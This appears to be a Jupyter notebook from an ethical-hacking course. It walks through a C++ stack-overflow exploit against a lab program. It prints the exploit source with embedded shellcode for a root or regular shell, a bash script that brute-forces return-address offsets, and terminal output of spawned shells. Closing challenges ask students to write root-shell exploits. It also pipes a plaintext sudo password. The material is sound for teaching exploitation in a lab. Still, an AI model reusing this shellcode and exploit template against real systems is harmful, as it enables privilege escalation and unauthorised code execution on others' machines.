# Exploit Code

- code/program that delivers payload is called exploit code
- helps delivers the shellcode code directly to the vulnerable program
    - over network, stdio, program argument, etc.
- you can create a exploitcode in Bash, Python, C/C++, etc. to send the payload to the vulnerable target program
- this notebook demostrates writing exploit code in C/C++

## C++ exploit code

- as we've seen that the base address of buffer shifts in memory depending on the size of the program and the argument it takes
    - the buffer address we see on GDB is not that same as the program is run outside GDB due to GDB's environment varaibles
    - finding the base address of buffer and NOP sled landing target becomes a moving target and thus a challenging one 
- C/C++ exploits make it easier to guess the buffer address (a.k.a controlled return address) of the NOP sled landing zone
- since C/C++ programs make it easier to print the address of any variables, one can create a reference variable on the stack of exploit program
    - using the reference variable's address as a point of reference, the target program that's loaded by this program will be on top (lower memory address) with respect to this program
    - can try and guess the offset to subtract from the reference variable's address as the return address that lands somewhere in the NOP sled
- a sample exploit code in C++ is provided in `demos/stack_overflow/so_arg_exploit.cpp`

In [8]:
! cp ./demos/stack_overflow/so_arg.cpp .
! cp ./demos/stack_overflow/so_arg_exploit.cpp .

In [10]:
%%bash

input="./demos/stack_overflow/so_arg.cpp"
output="so_arg.exe"

echo kali | sudo -S ./compile.sh $input $output

[sudo] password for kali: 

In [11]:
! ./so_arg.exe "Hello World"

buffer is at 0xffffc2d0
buffer contains: 
Hello World
Good bye!


In [9]:
! cat ./demos/stack_overflow/so_arg_exploit.cpp

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <iostream>
#include <string>

using namespace std;

/*
return address is calculated based-on the exploit code's stack variable address
however, need to do a guessing work on finding the right offset to find the target
program's caller's return address relative to the buffer

Steps:
find the payload size needed to overwrite the return address
    - buffer's address is automatically calculated
creat payload: [NOP sled | shellcode | repeated return address]
launch target program with the payload: system("./targetProgram payload")
*/
   
string shellcode = 
     // root shell; that escalates the priviledge for exploiting setuid program
     "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
     "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
     "\xe1\xcd\x80";
     
     // regular shell
     /*
     "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31"
     "\xc9\x89\xca\

- just need to update couple of variables with this exploit template
    1. targer program name
    2. the payload_len (offset) of the target program's return address
    
- we already know the offset is **144** for so_arg.exe from the previous demonstration
- use peda's pattern create and search technique as described in Stack Overflow Remote Code execution notebook and others
- the exploit automatically finds the return address based on the exploit program's ref_variable on it's stack and the provided argument as the offset
    - however, one has to still guess the offset (the value that needs to be subtracted from the adddress of ref_variable to find the address of NOP sled on the target program's stack
- the exploit creates the payload in the form:

```
| NOP sled | shellcode | repeated return address |
```
- compile the exploit program

In [15]:
%%bash
input="demos/stack_overflow/so_arg_exploit.cpp"
output="so_arg_exploit.exe"
echo kali | sudo -S ./compile.sh $input $output

[sudo] password for kali: 

- prgram provides default offset, if you're lucky this may work and you don't have to provide guessed offset as an argument

```bash
┌──(kali㉿K)-[~/EthicalHacking]
└─$ ./so_arg_exploit.exe           
buffer is at 0xffffc2d0
buffer contains: 
�����������������������������������������������������������������������������������������1�1�1ə��j
                                                                                                  XQh//shh/bin��Q��S�� ��� ��� ��� ��� ���
$ whoami
kali
$ date
Thu Dec 17 12:49:38 MST 2020
$ exit
```

### Providing offset via argument
- the C++ exploit code is written in such a way that it accepts some offset as an argument
- this allows us to script and continuously guess the right offset to generate the right return address that lands somewhere on the NOP sled
- a demo script to automate this process is provided in `demos/stack_overflow/so_arg_cpp_exploit.sh`

In [18]:
! cp ./demos/stack_overflow/so_arg_cpp_exploit.sh .

In [19]:
! cat so_arg_cpp_exploit.sh

#!/bin/bash

for i in $(seq 100 4 120)
do
    echo Trying offset $i
    ./so_arg_exploit.exe $i
done


- the bash script runs the target program so_arg_exploit.exe several times; each time with offset ranging from 100 to 120 with a step of 4

- now run the Bash script that repeatedly runs the exploit program with various offset as an argument
- if you don't get a shell withing this offset range, you can widen it to stop at bigger offset, can also cange the step from 4 to 1 to try every number in between
- we get the root shell when trying with **offset 100** and others as shown following

```bash
┌──(kali㉿K)-[~/EthicalHacking]
└─$ bash so_arg_cpp_exploit.sh   
Trying offset 100
buffer is at 0xffffc2e0
buffer contains: 
�����������������������������������������������������������������������������������������1�1�1ə��j
                                                                                                  XQh//shh/bin��Q��S��0���0���0���0���0���
$ whoami
kali
$ date
Thu Dec 17 12:59:06 MST 2020
$ exit
Trying offset 104
buffer is at 0xffffc2e0
buffer contains: 
�����������������������������������������������������������������������������������������1�1�1ə��j
                                                                                                  XQh//shh/bin��Q��S��,���,���,���,���,���
$ exit
Trying offset 108
buffer is at 0xffffc2e0
buffer contains: 
�����������������������������������������������������������������������������������������1�1�1ə��j
                                                                                                  XQh//shh/bin��Q��S��(���(���(���(���(���
$ 

```

## Challenge

1. Modify the above `demos/stack_overflow/so_arg_exploit.cpp` C++ demo exploit code to get a root shell (instead of the regular shell)
    - test to make sure the exploit code works
    

2. Write exploit code for `demos/stack_overflow/so_stdio.cpp` demo program
    - exploit gives user shell
    - test to make sure the exploit code works
    
    
3. Write exploit code for s`demos/tack_overflow/so_stdio.cpp` demo program
    - exploit gives root shell
    - test to make sure the exploit code works